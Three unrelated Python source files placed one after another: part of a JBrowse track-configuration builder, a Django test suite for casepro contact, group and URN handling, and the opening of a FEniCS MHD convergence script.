        tracks = ','.join(self.tracksToIndex)

        if tracks:
            args += ['--tracks', tracks]
        else:
            # No tracks to index, index only the refseq
            args += ['--tracks', 'DNA']

        self.subprocess_check_call(args)

    def _add_json(self, json_data):
        """Merge arbitrary JSON into data/trackList.json via add-json.pl."""
        cmd = [
            'perl', self._jbrowse_bin('add-json.pl'),
            json.dumps(json_data),
            os.path.join('data', 'trackList.json')
        ]
        self.subprocess_check_call(cmd)

    def _add_track_json(self, json_data):
        """Append one track definition via add-track-json.pl (no-op if empty)."""
        if len(json_data) == 0:
            return

        # add-track-json.pl reads the track from a file, so round-trip the
        # JSON through a temp file that is removed afterwards.
        # NOTE(review): writes str to a binary-mode temp file -- fine on
        # Python 2, would need an encode step on Python 3.
        tmp = tempfile.NamedTemporaryFile(delete=False)
        tmp.write(json.dumps(json_data))
        tmp.close()
        cmd = ['perl', self._jbrowse_bin('add-track-json.pl'), tmp.name,
               os.path.join('data', 'trackList.json')]
        self.subprocess_check_call(cmd)
        os.unlink(tmp.name)

    def _blastxml_to_gff3(self, xml, min_gap=10):
        """Convert Blast XML to gapped GFF3 via the bundled helper script.

        Returns the path of a caller-owned temporary GFF3 file.
        """
        gff3_unrebased = tempfile.NamedTemporaryFile(delete=False)
        cmd = ['python', os.path.join(INSTALLED_TO, 'blastxml_to_gapped_gff3.py'),
               '--trim', '--trim_end', '--min_gap', str(min_gap), xml]
        log.debug('cd %s && %s > %s', self.outdir, ' '.join(cmd), gff3_unrebased.name)
        subprocess.check_call(cmd, cwd=self.outdir, stdout=gff3_unrebased)
        gff3_unrebased.close()
        return gff3_unrebased.name

    def add_blastxml(self, data, trackData, blastOpts, **kwargs):
        """Add a Blast XML dataset as a CanvasFeatures track."""
        gff3 = self._blastxml_to_gff3(data, min_gap=blastOpts['min_gap'])

        if 'parent' in blastOpts and blastOpts['parent'] != 'None':
            # Re-map blast hit coordinates onto a parent feature set.
            gff3_rebased = tempfile.NamedTemporaryFile(delete=False)
            cmd = ['python', os.path.join(INSTALLED_TO, 'gff3_rebase.py')]
            if blastOpts.get('protein', 'false') == 'true':
                cmd.append('--protein2dna')
            cmd.extend([os.path.realpath(blastOpts['parent']), gff3])
            log.debug('cd %s && %s > %s', self.outdir, ' '.join(cmd), gff3_rebased.name)
            subprocess.check_call(cmd, cwd=self.outdir, stdout=gff3_rebased)
            gff3_rebased.close()

            # Replace original gff3 file
            shutil.copy(gff3_rebased.name, gff3)
            os.unlink(gff3_rebased.name)

        config = {
            'glyph': 'JBrowse/View/FeatureGlyph/Segments',
            "category": trackData['category'],
        }

        clientConfig = trackData['style']

        cmd = ['perl', self._jbrowse_bin('flatfile-to-json.pl'),
               '--gff', gff3,
               '--trackLabel', trackData['label'],
               '--key', trackData['key'],
               '--clientConfig', json.dumps(clientConfig),
               '--config', json.dumps(config),
               '--trackType', 'JBrowse/View/Track/CanvasFeatures'
               ]

        # className in --clientConfig is ignored, it needs to be set with --className
        if 'className' in trackData['style']:
            cmd += ['--className', trackData['style']['className']]

        self.subprocess_check_call(cmd)
        os.unlink(gff3)

        if blastOpts.get('index', 'false') == 'true':
            self.tracksToIndex.append("%s" % trackData['label'])

    def add_bigwig(self, data, trackData, wiggleOpts, **kwargs):
        """Add a BigWig dataset as a Wiggle track (hard link into data/raw)."""
        dest = os.path.join('data', 'raw', trackData['label'] + '.bw')
        # NOTE(review): hard link (no '-s'), unlike add_bam/add_vcf which
        # symlink -- confirm this is intentional.
        cmd = ['ln', data, dest]
        self.subprocess_check_call(cmd)

        url = os.path.join('raw', trackData['label'] + '.bw')
        trackData.update({
            "urlTemplate": url,
            "storeClass": "JBrowse/Store/SeqFeature/BigWig",
            "type": "JBrowse/View/Track/Wiggle/Density",
        })

        # The Density default above is immediately overridden by the
        # user-selected wiggle type.
        trackData['type'] = wiggleOpts['type']
        trackData['variance_band'] = True if wiggleOpts['variance_band'] == 'true' else False

        if 'min' in wiggleOpts and 'max' in wiggleOpts:
            trackData['min_score'] = wiggleOpts['min']
            trackData['max_score'] = wiggleOpts['max']
        else:
            trackData['autoscale'] = wiggleOpts.get('autoscale', 'local')

        self._add_track_json(trackData)

    def add_bam(self, data, trackData, bamOpts, bam_index=None, **kwargs):
        """Add a BAM (+index) as an Alignments2 track; optionally a SNP
        coverage companion track."""
        dest = os.path.join('data', 'raw', trackData['label'] + '.bam')
        cmd = ['ln', '-s', os.path.realpath(data), dest]
        self.subprocess_check_call(cmd)

        cmd = ['ln', '-s', os.path.realpath(bam_index), dest + '.bai']
        self.subprocess_check_call(cmd)

        url = os.path.join('raw', trackData['label'] + '.bam')
        trackData.update({
            "urlTemplate": url,
            "type": "JBrowse/View/Track/Alignments2",
            "storeClass": "JBrowse/Store/SeqFeature/BAM",
        })

        self._add_track_json(trackData)

        if bamOpts.get('auto_snp', 'false') == 'true':
            # Derived track sharing the same store, rendered as SNP coverage.
            trackData2 = copy.copy(trackData)
            trackData2.update({
                "type": "JBrowse/View/Track/SNPCoverage",
                "key": trackData['key'] + " - SNPs/Coverage",
                "label": trackData['label'] + "_autosnp",
            })
            self._add_track_json(trackData2)

    def add_vcf(self, data, trackData, vcfOpts={}, **kwargs):
        """Add a VCF as an HTMLVariants track (bgzipped + tabix-indexed).

        NOTE(review): `vcfOpts={}` is a mutable default argument (unused
        here, so harmless, but a known Python pitfall). Also, bgzip renames
        the file to '.vcf.gz' while urlTemplate points at '.vcf' -- confirm
        JBrowse's VCFTabix store appends the .gz suffix itself.
        """
        dest = os.path.join('data', 'raw', trackData['label'] + '.vcf')
        # Symlink the input next to the data, then compress + index in place.
        cmd = ['ln', '-s', data, dest]
        self.subprocess_check_call(cmd)
        cmd = ['bgzip', dest]
        self.subprocess_check_call(cmd)
        cmd = ['tabix', '-p', 'vcf', dest + '.gz']
        self.subprocess_check_call(cmd)

        url = os.path.join('raw', trackData['label'] + '.vcf')
        trackData.update({
            "urlTemplate": url,
            "type": "JBrowse/View/Track/HTMLVariants",
            "storeClass": "JBrowse/Store/SeqFeature/VCFTabix",
        })
        self._add_track_json(trackData)

    def add_features(self, data, format, trackData, gffOpts, **kwargs):
        """Add a GFF/GFF3/BED/GenBank dataset via flatfile-to-json.pl."""
        cmd = [
            'perl', self._jbrowse_bin('flatfile-to-json.pl'),
            self.TN_TABLE.get(format, 'gff'),
            data,
            '--trackLabel', trackData['label'],
            '--key', trackData['key']
        ]

        # className in --clientConfig is ignored, it needs to be set with --className
        if 'className' in trackData['style']:
            cmd += ['--className', trackData['style']['className']]

        # Style goes to --clientConfig; everything else to --config.
        config = copy.copy(trackData)
        clientConfig = trackData['style']
        del config['style']

        if 'match' in gffOpts:
            config['glyph'] = 'JBrowse/View/FeatureGlyph/Segments'
            cmd += ['--type', gffOpts['match']]

        cmd += ['--clientConfig', json.dumps(clientConfig),
                ]

        trackType = 'JBrowse/View/Track/CanvasFeatures'
        if 'trackType' in gffOpts:
            trackType = gffOpts['trackType']

        if trackType == 'JBrowse/View/Track/CanvasFeatures':
            if 'transcriptType' in gffOpts and gffOpts['transcriptType']:
                config['transcriptType'] = gffOpts['transcriptType']
            if 'subParts' in gffOpts and gffOpts['subParts']:
                config['subParts'] = gffOpts['subParts']
            if 'impliedUTRs' in gffOpts and gffOpts['impliedUTRs']:
                config['impliedUTRs'] = gffOpts['impliedUTRs']
        elif trackType == 'JBrowse/View/Track/HTMLFeatures':
            if 'transcriptType' in gffOpts and gffOpts['transcriptType']:
                cmd += ['--type', gffOpts['transcriptType']]

        cmd += [
            '--trackType', gffOpts['trackType']
        ]

        cmd.extend(['--config', json.dumps(config)])

        self.subprocess_check_call(cmd)

        if gffOpts.get('index', 'false') == 'true':
            self.tracksToIndex.append("%s" % trackData['label'])

    def process_annotations(self, track):
        """Add every dataset of one parsed <track> element.

        Yields the generated (machine) label of each added track.
        """
        outputTrackConfig = {
            'style': {
                'label': track['style'].get('label', 'description'),
                'className': track['style'].get('className', 'feature'),
                'description': track['style'].get('description', ''),
            },
            'category': track['category'],
        }

        for i, (dataset_path, dataset_ext, track_human_label) in enumerate(track['trackfiles']):
            log.info('Processing %s / %s', track['category'], track_human_label)
            outputTrackConfig['key'] = track_human_label
            # Machine label: md5 of path|label|category, suffixed with the
            # dataset index to keep it unique within the track.
            hashData = [dataset_path, track_human_label, track['category']]
            outputTrackConfig['label'] = hashlib.md5('|'.join(hashData).encode('utf-8')).hexdigest() + '_%s' % i

            # Colour parsing is complex due to different track types having
            # different colour options.
            colourOptions = self.cs.parse_colours(track['conf']['options'], track['format'], gff3=dataset_path)
            # This used to be done with a dict.update() call, however that wiped out any previous style settings...
            for key in colourOptions:
                if key == 'style':
                    for subkey in colourOptions['style']:
                        outputTrackConfig['style'][subkey] = colourOptions['style'][subkey]
                else:
                    outputTrackConfig[key] = colourOptions[key]

            if 'menus' in track['conf']['options']:
                menus = self.cs.parse_menus(track['conf']['options'])
                outputTrackConfig.update(menus)

            # Dispatch on the dataset extension to the right adder.
            if dataset_ext in ('gff', 'gff3', 'bed'):
                self.add_features(dataset_path, dataset_ext, outputTrackConfig,
                                  track['conf']['options']['gff'])
            elif dataset_ext == 'bigwig':
                self.add_bigwig(dataset_path, outputTrackConfig,
                                track['conf']['options']['wiggle'])
            elif dataset_ext == 'bam':
                real_indexes = track['conf']['options']['pileup']['bam_indices']['bam_index']
                if not isinstance(real_indexes, list):
                    # <bam_indices>
                    #  <bam_index>/path/to/a.bam.bai</bam_index>
                    # </bam_indices>
                    #
                    # The above will result in the 'bam_index' key containing a
                    # string. If there are two or more indices, the container
                    # becomes a list. Fun!
                    real_indexes = [real_indexes]

                self.add_bam(dataset_path, outputTrackConfig,
                             track['conf']['options']['pileup'],
                             bam_index=real_indexes[i])
            elif dataset_ext == 'blastxml':
                self.add_blastxml(dataset_path, outputTrackConfig, track['conf']['options']['blast'])
            elif dataset_ext == 'vcf':
                self.add_vcf(dataset_path, outputTrackConfig)

            # Return non-human label for use in other fields
            yield outputTrackConfig['label']

    def add_final_data(self, data):
        """Write instance-wide settings (track visibility, general view
        options) into trackList.json."""
        viz_data = {}
        if len(data['visibility']['default_on']) > 0:
            viz_data['defaultTracks'] = ','.join(data['visibility']['default_on'])

        if len(data['visibility']['always']) > 0:
            viz_data['alwaysOnTracks'] = ','.join(data['visibility']['always'])

        if len(data['visibility']['force']) > 0:
            viz_data['forceTracks'] = ','.join(data['visibility']['force'])

        generalData = {}
        if data['general']['aboutDescription'] is not None:
            generalData['aboutThisBrowser'] = {'description': data['general']['aboutDescription'].strip()}

        generalData['view'] = {
            'trackPadding': data['general']['trackPadding']
        }
        # XML carries 'true'/'false' strings; convert to real booleans.
        generalData['shareLink'] = (data['general']['shareLink'] == 'true')
        generalData['show_tracklist'] = (data['general']['show_tracklist'] == 'true')
        generalData['show_nav'] = (data['general']['show_nav'] == 'true')
        generalData['show_overview'] = (data['general']['show_overview'] == 'true')
        generalData['show_menu'] = (data['general']['show_menu'] == 'true')
        generalData['hideGenomeOptions'] = (data['general']['hideGenomeOptions'] == 'true')

        viz_data.update(generalData)
        self._add_json(viz_data)

    def clone_jbrowse(self, jbrowse_dir, destination):
        """Clone a JBrowse directory into a destination directory.
        """
        # JBrowse seems to have included some bad symlinks, cp ignores bad symlinks
        # unlike copytree
        cmd = ['cp', '-r', os.path.join(jbrowse_dir, '.'), destination]
        log.debug(' '.join(cmd))
        subprocess.check_call(cmd)
        cmd = ['mkdir', '-p', os.path.join(destination, 'data', 'raw')]
        log.debug(' '.join(cmd))
        subprocess.check_call(cmd)

        # http://unix.stackexchange.com/a/38691/22785
        # JBrowse releases come with some broken symlinks
        cmd = ['find', destination, '-type', 'l', '-xtype', 'l', '-exec', 'rm', "'{}'", '+']
        log.debug(' '.join(cmd))
        subprocess.check_call(cmd)
if __name__ == '__main__':
    # Command-line entry point: parse the track-configuration XML and drive
    # a JbrowseConnector with it.
    parser = argparse.ArgumentParser(description="", epilog="")
    parser.add_argument('xml', type=argparse.FileType('r'), help='Track Configuration')

    parser.add_argument('--jbrowse', help='Folder containing a jbrowse release')
    parser.add_argument('--outdir', help='Output directory', default='out')
    parser.add_argument('--standalone', help='Standalone mode includes a copy of JBrowse', action='store_true')
    args = parser.parse_args()

    tree = ET.parse(args.xml.name)
    root = tree.getroot()

    jc = JbrowseConnector(
        jbrowse=args.jbrowse,
        outdir=args.outdir,
        genomes=[os.path.realpath(x.text) for x in root.findall('metadata/genomes/genome')],
        standalone=args.standalone,
        gencode=root.find('metadata/gencode').text
    )

    # Instance-wide settings collected from the XML, applied once all tracks
    # have been processed.
    # NOTE(review): 'defaultLocation' is collected but not consumed by
    # add_final_data -- confirm whether it is intentionally unused.
    extra_data = {
        'visibility': {
            'default_on': [],
            'default_off': [],
            'force': [],
            'always': [],
        },
        'general': {
            'defaultLocation': root.find('metadata/general/defaultLocation').text,
            'trackPadding': int(root.find('metadata/general/trackPadding').text),
            'shareLink': root.find('metadata/general/shareLink').text,
            'aboutDescription': root.find('metadata/general/aboutDescription').text,
            'show_tracklist': root.find('metadata/general/show_tracklist').text,
            'show_nav': root.find('metadata/general/show_nav').text,
            'show_overview': root.find('metadata/general/show_overview').text,
            'show_menu': root.find('metadata/general/show_menu').text,
            'hideGenomeOptions': root.find('metadata/general/hideGenomeOptions').text,
        }
    }
    for track in root.findall('tracks/track'):
        track_conf = {}
        track_conf['trackfiles'] = [
            (os.path.realpath(x.attrib['path']), x.attrib['ext'], x.attrib['label'])
            for x in track.findall('files/trackFile')
        ]
        track_conf['category'] = track.attrib['cat']
        track_conf['format'] = track.attrib['format']
        try:
            # Only pertains to gff3 + blastxml. TODO?
            track_conf['style'] = {t.tag: t.text for t in track.find('options/style')}
        except TypeError:
            # <options> has no <style> child; fall back to empty style.
            track_conf['style'] = {}
            pass
        track_conf['conf'] = etree_to_dict(track.find('options'))
        keys = jc.process_annotations(track_conf)

        # Record each generated track label under its visibility bucket.
        for key in keys:
            extra_data['visibility'][track.attrib.get('visibility', 'default_off')].append(key)

    jc.add_final_data(extra_data)
    jc.generate_names()
| |
from dash.orgs.models import TaskState
from django.urls import reverse
from django.test.utils import override_settings
from unittest.mock import patch
from casepro.test import BaseCasesTest
from .models import URN, Contact, Field, Group, InvalidURN
from .tasks import pull_contacts
class URNTest(BaseCasesTest):
    """Unit tests for the URN ("scheme:path") helper."""

    def test_from_parts(self):
        # valid scheme/path combinations are joined as "scheme:path"
        for scheme, path, expected in (
            ("tel", "12345", "tel:12345"),
            ("tel", "+12345", "tel:+12345"),
            ("tel", "(917) 992-5253", "tel:(917) 992-5253"),
            ("mailto", "a_b+c@d.com", "mailto:a_b+c@d.com"),
        ):
            self.assertEqual(URN.from_parts(scheme, path), expected)

        # empty scheme, empty path and unknown scheme are all rejected
        for scheme, path in (("", "12345"), ("tel", ""), ("xxx", "12345")):
            self.assertRaises(ValueError, URN.from_parts, scheme, path)

    def test_to_parts(self):
        for urn, parts in (
            ("tel:12345", ("tel", "12345")),
            ("tel:+12345", ("tel", "+12345")),
            ("twitter:abc_123", ("twitter", "abc_123")),
            ("mailto:a_b+c@d.com", ("mailto", "a_b+c@d.com")),
        ):
            self.assertEqual(URN.to_parts(urn), parts)

        # malformed URNs: no colon, empty path, empty scheme, invalid
        # scheme, invalid path
        for malformed in ("tel", "tel:", ":12345", "x_y:123", "xyz:{abc}"):
            self.assertRaises(ValueError, URN.to_parts, malformed)

    def test_normalize(self):
        cases = (
            # valid tel numbers are stripped of spacing/punctuation
            ("tel: +250788383383 ", "tel:+250788383383"),
            ("tel:+1(917)992-5253", "tel:+19179925253"),
            ("tel:250788383383", "tel:+250788383383"),
            # un-normalizable tel numbers pass through (lower-cased)
            ("tel:12345", "tel:12345"),
            ("tel:0788383383", "tel:0788383383"),
            ("tel:MTN", "tel:mtn"),
            # twitter handles are lower-cased and lose their @
            ("twitter: @jimmyJO", "twitter:jimmyjo"),
            # email addresses are trimmed and lower-cased
            ("mailto: nAme@domAIN.cOm ", "mailto:name@domain.com"),
        )
        for raw, normalized in cases:
            self.assertEqual(URN.normalize(raw), normalized)

    def test_validate(self):
        self.assertTrue(URN.validate("tel:+27825552233"))
        # local numbers without a country code are rejected
        self.assertRaises(InvalidURN, URN.validate, "tel:0825550011")
        # unknown schemes are accepted as-is
        self.assertTrue(URN.validate("unknown_scheme:address_for_unknown_scheme"))

    def test_validate_phone(self):
        bad_numbers = (
            "0825550011",  # lacks country code
            "(+27)825550011",  # incorrect format (E.123)
            "+278255500abc",  # incorrect format
            "+278255500115555555",  # too long
        )
        for number in bad_numbers:
            self.assertRaises(InvalidURN, URN.validate_phone, number)

        self.assertTrue(URN.validate_phone("+27825552233"))
class ContactTest(BaseCasesTest):
    """Tests for the Contact model: saving/sync, display helpers, release
    and JSON serialization."""

    def setUp(self):
        super(ContactTest, self).setUp()

        # A contact in the Reporters group with two contact-field values.
        self.ann = self.create_contact(
            self.unicef, "7b7dd838-4947-4e85-9b5c-0e8b1794080b", "Ann", [self.reporters], {"age": "32", "state": "WA"}
        )

    def test_save(self):
        # start with no data
        Contact.objects.all().delete()
        Group.objects.all().delete()
        Field.objects.all().delete()

        # __data__groups is the hook used to pass incoming group
        # memberships -- presumably consumed by the sync layer on save;
        # verify against the Contact model.
        contact = Contact.objects.create(
            org=self.unicef,
            uuid="C-001",
            name="Bob McFlow",
            language="eng",
            is_stub=False,
            fields={"age": "34"},
            __data__groups=[("G-001", "Customers")],
            urns=["tel:0821234567"],
        )

        self.assertEqual(contact.uuid, "C-001")
        self.assertEqual(contact.name, "Bob McFlow")
        self.assertEqual(contact.language, "eng")
        self.assertEqual(contact.get_fields(), {"age": "34"})
        self.assertEqual(contact.urns, ["tel:0821234567"])

        # the save should have created the group and linked the contact to it
        customers = Group.objects.get(org=self.unicef, uuid="G-001", name="Customers")

        self.assertEqual(set(contact.groups.all()), {customers})

        contact = Contact.objects.select_related("org").prefetch_related("groups").get(uuid="C-001")

        # check there are no extra db hits when saving without change, assuming appropriate pre-fetches (as above)
        with self.assertNumQueries(1):
            setattr(contact, "__data__groups", [("G-001", "Customers")])
            contact.save()

        # check removing a group and adding new ones
        with self.assertNumQueries(7):
            setattr(contact, "__data__groups", [("G-002", "Spammers"), ("G-003", "Boffins")])
            contact.save()

        contact = Contact.objects.get(uuid="C-001")

        spammers = Group.objects.get(org=self.unicef, uuid="G-002", name="Spammers")
        boffins = Group.objects.get(org=self.unicef, uuid="G-003", name="Boffins")

        self.assertEqual(set(contact.groups.all()), {spammers, boffins})

    def test_get_display(self):
        # if the site uses 'uuid' for the display
        with override_settings(SITE_CONTACT_DISPLAY="uuid"):
            self.assertEqual(self.ann.get_display(), "7B7DD8")

        # if the site uses 'urns' for the display
        self.ann.urns = ["tel:+2345"]
        with override_settings(SITE_CONTACT_DISPLAY="urns"):
            self.assertEqual(self.ann.get_display(), "+2345")
        self.ann.refresh_from_db()

        # if the site uses 'name' or something unrecognised for the display
        self.assertEqual(self.ann.get_display(), "Ann")
        self.ann.name = None
        self.assertEqual(self.ann.get_display(), "---")

    def test_get_fields(self):
        self.assertEqual(self.ann.get_fields(), {"age": "32", "state": "WA"})  # what is stored on the contact
        self.assertEqual(self.ann.get_fields(visible=True), {"nickname": None, "age": "32"})  # visible fields

    def test_release(self):
        # two incoming messages attached to the contact before release
        self.create_message(self.unicef, 101, self.ann, "Hello")
        self.create_message(self.unicef, 102, self.ann, "Goodbye")

        self.ann.release()

        self.assertEqual(self.ann.groups.count(), 0)  # should be removed from groups
        self.assertEqual(self.ann.incoming_messages.count(), 2)  # messages should be inactive and handled
        self.assertEqual(self.ann.incoming_messages.filter(is_active=False, is_handled=True).count(), 2)

    def test_as_json(self):
        # minimal form only carries the id and display name
        self.assertEqual(self.ann.as_json(full=False), {"id": self.ann.pk, "display": "Ann"})

        # full=True means include visible contact fields and language etc
        self.assertEqual(
            self.ann.as_json(full=True),
            {
                "id": self.ann.pk,
                "display": "Ann",
                "name": "Ann",
                "urns": [],
                "language": {"code": "eng", "name": "English"},
                "groups": [{"id": self.reporters.pk, "name": "Reporters"}],
                "fields": {"nickname": None, "age": "32"},
                "blocked": False,
                "stopped": False,
            },
        )

        self.ann.language = None
        self.ann.urns = ["tel:+2345678", "mailto:ann@test.com"]
        self.ann.save()

        self.assertEqual(
            self.ann.as_json(full=True),
            {
                "id": self.ann.pk,
                "display": "Ann",
                "name": "Ann",
                "urns": ["tel:+2345678", "mailto:ann@test.com"],
                "language": None,
                "groups": [{"id": self.reporters.pk, "name": "Reporters"}],
                "fields": {"nickname": None, "age": "32"},
                "blocked": False,
                "stopped": False,
            },
        )

        # If the urns and name fields are hidden they should not be returned
        # SITE_CONTACT_DISPLAY overrules this for the 'display' attr
        with override_settings(SITE_HIDE_CONTACT_FIELDS=["urns", "name"], SITE_CONTACT_DISPLAY="uuid"):
            self.assertEqual(
                self.ann.as_json(full=True),
                {
                    "id": self.ann.pk,
                    "display": "7B7DD8",
                    "urns": [],
                    "name": None,
                    "language": None,
                    "groups": [{"id": self.reporters.pk, "name": "Reporters"}],
                    "fields": {"nickname": None, "age": "32"},
                    "blocked": False,
                    "stopped": False,
                },
            )

    @patch("casepro.test.TestBackend.push_contact")
    def test_get_or_create_from_urn(self, mock_push_contact):
        """
        If no contact with a matching urn exists a new one should be created
        """
        Contact.objects.all().delete()

        # try with a URN that doesn't match an existing contact
        contact1 = Contact.get_or_create_from_urn(self.unicef, "tel:+27827654321")

        self.assertEqual(contact1.urns, ["tel:+27827654321"])
        self.assertIsNone(contact1.name)
        self.assertIsNone(contact1.uuid)

        # check that the backend was updated
        self.assertTrue(mock_push_contact.called)
        mock_push_contact.reset_mock()

        # try with a URN that does match an existing contact
        contact2 = Contact.get_or_create_from_urn(self.unicef, "tel:+27827654321")

        self.assertEqual(contact2, contact1)

        # we shouldn't update the backend because a contact wasn't created
        self.assertFalse(mock_push_contact.called)

        # URN will be normalized
        contact3 = Contact.get_or_create_from_urn(self.unicef, "tel:+(278)-2765-4321")

        self.assertEqual(contact3, contact1)

        # we shouldn't update the backend because a contact wasn't created
        self.assertFalse(mock_push_contact.called)

        # we get an exception if URN isn't valid (e.g. local number)
        self.assertRaises(InvalidURN, Contact.get_or_create_from_urn, self.unicef, "tel:0827654321")
class ContactCRUDLTest(BaseCasesTest):
    """Tests for the contact list, read, fetch and cases endpoints."""

    def setUp(self):
        super(ContactCRUDLTest, self).setUp()

        # single contact shared by every test below
        self.ann = self.create_contact(self.unicef, "C-001", "Ann", [self.reporters], {"age": "32"})

    def test_list(self):
        list_url = reverse("contacts.contact_list")

        # an org admin is redirected away from the list view
        self.login(self.admin)
        resp = self.url_get("unicef", list_url)
        self.assertEqual(resp.status_code, 302)

        # only superusers may browse the full contact list
        self.login(self.superuser)
        resp = self.url_get("unicef", list_url)
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(list(resp.context["object_list"]), [self.ann])

    def test_read(self):
        read_url = reverse("contacts.contact_read", args=[self.ann.pk])

        # a plain partner user sees the page but no backend link
        self.login(self.user1)
        resp = self.url_get("unicef", read_url)
        self.assertEqual(resp.status_code, 200)
        self.assertNotContains(resp, "View External")

        # administrators additionally get the button linking to the backend
        self.login(self.admin)
        resp = self.url_get("unicef", read_url)
        self.assertContains(resp, "View External")

        # users belonging to another org are bounced to login
        self.login(self.user4)
        resp = self.url_get("unicef", read_url)
        self.assertLoginRedirect(resp, read_url)

    def test_fetch(self):
        fetch_url = reverse("contacts.contact_fetch", args=[self.ann.pk])

        # a regular user may fetch the contact as JSON
        self.login(self.user1)
        resp = self.url_get("unicef", fetch_url)
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(
            resp.json,
            {
                "id": self.ann.pk,
                "display": "Ann",
                "name": "Ann",
                "urns": [],
                "language": {"code": "eng", "name": "English"},
                "groups": [{"id": self.reporters.pk, "name": "Reporters"}],
                "fields": {"age": "32", "nickname": None},
                "blocked": False,
                "stopped": False,
            },
        )

    def test_cases(self):
        cases_url = reverse("contacts.contact_cases", args=[self.ann.pk])

        first_msg = self.create_message(self.unicef, 101, self.ann, "What is tea?")
        closed_case = self.create_case(self.unicef, self.ann, self.moh, first_msg, [])
        closed_case.close(self.admin)
        second_msg = self.create_message(self.unicef, 102, self.ann, "I'm pregnant")
        open_case = self.create_case(self.unicef, self.ann, self.moh, second_msg, [self.pregnancy, self.aids])

        # admin sees every case, newest first
        self.login(self.admin)
        resp = self.url_get("unicef", cases_url)
        self.assertEqual([c["id"] for c in resp.json["results"]], [open_case.pk, closed_case.pk])

        # user1 sees both cases because of assignment/labels
        self.login(self.user1)
        resp = self.url_get("unicef", cases_url)
        self.assertEqual([c["id"] for c in resp.json["results"]], [open_case.pk, closed_case.pk])

        # user3 sees only the case carrying the pregnancy label
        self.login(self.user3)
        resp = self.url_get("unicef", cases_url)
        self.assertEqual([c["id"] for c in resp.json["results"]], [open_case.pk])
class FieldCRUDLTest(BaseCasesTest):
    """Tests for the field list view."""

    def test_list(self):
        list_url = reverse("contacts.field_list")

        # partner-level users are redirected to login
        self.login(self.user1)
        resp = self.url_get("unicef", list_url)
        self.assertLoginRedirect(resp, list_url)

        # org administrators see every field
        self.login(self.admin)
        resp = self.url_get("unicef", list_url)
        self.assertEqual(list(resp.context["object_list"]), [self.age, self.nickname, self.state])
class GroupTest(BaseCasesTest):
    """Tests for the Group model helpers."""

    def test_model(self):
        hidden = self.create_group(self.unicef, "G-006", "Invisible", count=12, is_visible=False)

        # get_all with no filters returns visible and invisible groups alike
        everything = {self.males, self.females, self.reporters, self.registered, hidden}
        self.assertEqual(set(Group.get_all(self.unicef)), everything)

        # filtered variants
        self.assertEqual(set(Group.get_all(self.unicef, visible=True)), {self.males, self.females, self.registered})
        self.assertEqual(
            set(Group.get_all(self.unicef, dynamic=False)), {self.males, self.females, self.reporters, hidden}
        )

        # JSON serialization in both full and summary form
        self.assertEqual(
            hidden.as_json(full=True), {"id": hidden.pk, "name": "Invisible", "count": 12, "is_dynamic": False}
        )
        self.assertEqual(hidden.as_json(full=False), {"id": hidden.pk, "name": "Invisible"})
class GroupCRUDLTest(BaseCasesTest):
    """Tests for the group list and select views."""

    def test_list(self):
        list_url = reverse("contacts.group_list")

        # partner users are redirected to login
        self.login(self.user1)
        resp = self.url_get("unicef", list_url)
        self.assertLoginRedirect(resp, list_url)

        # org admins see the visible groups
        self.login(self.admin)
        resp = self.url_get("unicef", list_url)
        self.assertEqual(list(resp.context["object_list"]), [self.females, self.males, self.registered])

    def test_select(self):
        select_url = reverse("contacts.group_select")

        # partner users are redirected to login
        self.login(self.user1)
        resp = self.url_get("unicef", select_url)
        self.assertLoginRedirect(resp, select_url)

        # org admins get a form pre-populated with the currently visible groups
        self.login(self.admin)
        resp = self.url_get("unicef", select_url)
        initial_groups = set(resp.context["form"]["groups"].field.initial)
        self.assertEqual(initial_groups, {self.females.pk, self.males.pk, self.registered.pk})

        # submitting a new selection changes which groups are visible
        resp = self.url_post("unicef", select_url, {"groups": [self.females.pk, self.reporters.pk]})
        self.assertRedirects(resp, "/group/", fetch_redirect_response=False)
        self.assertEqual(set(Group.get_all(self.unicef, visible=True)), {self.females, self.reporters})
        self.assertEqual(set(Group.get_all(self.unicef, visible=False)), {self.males, self.registered})
class TasksTest(BaseCasesTest):
    """Tests for the contact-pull background task."""

    @patch("casepro.test.TestBackend.pull_fields")
    @patch("casepro.test.TestBackend.pull_groups")
    @patch("casepro.test.TestBackend.pull_contacts")
    def test_pull_contacts(self, mock_pull_contacts, mock_pull_groups, mock_pull_fields):
        # each pull returns a 4-tuple of counts; the first three are recorded
        # as created/updated/deleted in the task results
        mock_pull_fields.return_value = (1, 2, 3, 4)
        mock_pull_groups.return_value = (5, 6, 7, 8)
        mock_pull_contacts.return_value = (9, 10, 11, 12)

        pull_contacts(self.unicef.pk)

        state = TaskState.objects.get(org=self.unicef, task_key="contact-pull")
        self.assertEqual(
            state.get_last_results(),
            {
                "fields": {"created": 1, "updated": 2, "deleted": 3},
                "groups": {"created": 5, "updated": 6, "deleted": 7},
                "contacts": {"created": 9, "updated": 10, "deleted": 11},
            },
        )
| |
#!/usr/bin/python
# interpolate scalar gradient onto nedelec space
from dolfin import *
import petsc4py
import sys
petsc4py.init(sys.argv)
from petsc4py import PETSc
Print = PETSc.Sys.Print
# from MatrixOperations import *
import numpy as np
#import matplotlib.pylab as plt
import PETScIO as IO
import common
import scipy
import scipy.io
import time
import BiLinear as forms
import IterOperations as Iter
import MatrixOperations as MO
import CheckPetsc4py as CP
import ExactSol
import Solver as S
import MHDmatrixPrecondSetup as PrecondSetup
import NSprecondSetup
# Number of mesh-refinement levels: the loop below runs levels 1 .. m-1.
m = 6

# Per-level error norms: velocity (u) in L2/H1, pressure (p) in L2,
# magnetic field (b) in L2/H(curl), multiplier (r) in L2/H1.
errL2u =np.zeros((m-1,1))
errH1u =np.zeros((m-1,1))
errL2p =np.zeros((m-1,1))
errL2b =np.zeros((m-1,1))
errCurlb =np.zeros((m-1,1))
errL2r =np.zeros((m-1,1))
errH1r =np.zeros((m-1,1))

# Observed convergence orders (log2 of successive error ratios).
l2uorder = np.zeros((m-1,1))
H1uorder =np.zeros((m-1,1))
l2porder = np.zeros((m-1,1))
l2border = np.zeros((m-1,1))
Curlborder =np.zeros((m-1,1))
l2rorder = np.zeros((m-1,1))
H1rorder = np.zeros((m-1,1))

# Mesh / degree-of-freedom bookkeeping per level.
NN = np.zeros((m-1,1))
DoF = np.zeros((m-1,1))
Velocitydim = np.zeros((m-1,1))
Magneticdim = np.zeros((m-1,1))
Pressuredim = np.zeros((m-1,1))
Lagrangedim = np.zeros((m-1,1))
Wdim = np.zeros((m-1,1))

# Solver statistics per level.
iterations = np.zeros((m-1,1))
